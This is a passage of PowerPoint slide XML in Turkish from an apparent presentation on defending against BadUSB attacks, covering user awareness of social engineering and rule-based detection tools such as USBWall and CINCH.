            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kullanıcıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>toplum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mühendisliğinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tehlikeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>konusunda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yönlendirerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilinçlendirerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>niyetli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kişilerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>insanların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güveninden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nasıl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yararlanabileceğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>pratik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>göstererek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sonuçlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edilebilir</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29776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0F1-1711-4D1C-BFBD-EA52D1337AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223919" y="-2"/>
            <a:ext cx="10353761" cy="855261"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Kural Tabanlı tespit mekanizmaları</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D0FBBE0-6D45-4273-A16C-C7C1011B436E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674446" y="4205364"/>
            <a:ext cx="1728041" cy="82703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USBWall</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1500" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9EA0B3D-F854-4CBA-93B5-80C852F6340D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674446" y="5026628"/>
            <a:ext cx="1728041" cy="170180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800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>USBWall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arasındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bağlantının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>numaralandırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aşamasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB'yi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>algılayan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>böylece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>onu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>niyetli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazlarına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karşı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>duvarı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>duran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>katman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılımıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA208064-72C0-421E-947E-C7AC5327FDF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4401651" y="4205362"/>
            <a:ext cx="1728041"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a:t>CINCH</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1500" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3CFCE1-C296-438A-A445-8DF7C9F901CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4401651" y="5026626"/>
            <a:ext cx="1728041" cy="1701800"/>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000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>CINCH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ayırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>katmanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gibi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>davranan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>katman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılımıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. CINCH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yürütülmeden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>önce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>devre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dışı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bırakmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>imzaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veritabanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ayrıca</a:t>
